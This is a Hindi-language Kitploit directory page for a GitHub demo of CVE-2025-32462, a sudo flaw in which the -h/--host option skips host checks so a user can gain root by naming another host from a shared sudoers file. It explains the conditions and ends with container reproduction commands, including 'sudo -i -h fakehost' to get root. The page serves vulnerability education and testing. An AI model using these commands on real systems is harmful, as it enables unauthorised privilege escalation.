Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-32462 — cve-2025-32462' डेमो | Kitploit
उपकरण/GitHubGitHub/spongebob-369/cve-2025-32462
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubspongebob-369/cve-2025-32462

cve-2025-32462

cve-2025-32462' डेमो

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2025-32462

sudo_description

sudo/NEWS at SUDO_1_8_8 · sudo-project/sudo · GitHub

sudo -h (--host) के दस्तावेज़ में लिखा है कि -h केवल -l के साथ ही उपयोग किया जा सकता है। बाद के अपडेट में sudo -h को -e, -i आदि के साथ भी उपयोग करने दिया गया।

sudo --host(-h) <username> -l(--list)

/etc/sudoer.d का उपयोग यह देखने के लिए किया जाता है कि किसी उपयोगकर्ता के पास सिस्टम में क्या अनुमतियाँ हैं। इन अनुमतियों को दरकिनार किया जा सकता है, जिससे एक उपयोगकर्ता एक सिस्टम पर अपने अधिकारों को बढ़ाकर दूसरे सिस्टम पर प्राप्त होने वाले अधिकार प्राप्त कर सकता है। यह विशेष रूप से उन सिस्टमों को प्रभावित करता है जो कई कंप्यूटरों के बीच एक ही sudoers कॉन्फ़िगरेशन फ़ाइल साझा करते हैं या नेटवर्क-आधारित उपयोगकर्ता निर्देशिकाओं (जैसे LDAP) का उपयोग करके sudoers नियम प्रदान करते हैं।

संक्षेप में: sudo का h/--host विकल्प न्यूनतम विशेषाधिकार सिद्धांत का पालन नहीं करता है, और गैर--l परिदृश्यों (जैसे कमांड निष्पादन) में होस्ट नियम सीमाओं को सत्यापित नहीं करता है। हमलावर /etc/sudoer.d फ़ाइल में दुर्भावनापूर्ण नियम कॉन्फ़िगर कर सकते हैं।

प्रभाव

मुख्य रूप से उन सिस्टम प्रशासकों के सिस्टम को प्रभावित करता है जो कई मशीनों पर एक ही sudoers फ़ाइल का उपयोग करते हैं।

शर्तें

भेद्यता हमले के लिए दो आवश्यकताओं को पूरा करना होगा:

  • हमलावर एक सत्यापित उपयोगकर्ता प्राप्त करता है
  • सिस्टम डिफ़ॉल्ट कॉन्फ़िगरेशन में नहीं है, और sudoers फ़ाइल में मौजूद अतिरिक्त नियमों पर निर्भर करता है

उदाहरण:

sudoers फ़ाइल में नियम हैं जो विभिन्न सिस्टमों पर उपयोगकर्ता के अधिकारों को परिभाषित करते हैं।

Alice hostA: कुछ विशेषाधिकार

Bob hostB: कुछ विशेषाधिकार

Bob hostA में लॉग इन करता है, फिर sudo -h hostB commandA कमांड चलाता है।

पुनरुत्पादन प्रक्रिया

root@kitploit:~
git clone https://github.com/SpongeBob-369/cve-2025-32462.git
cd cve-2025-32462
chmod +x run.sh
./run.sh
# after entering the contain Ubuntu
sudo -l
# then prompt you to enter your password, but "we" don't know.
sudo -l -h fakehost    # Check the permissions user ubuntu have in host named  fakehost
sudo -i -h fakehost    # get root
टूल डाउनलोड करें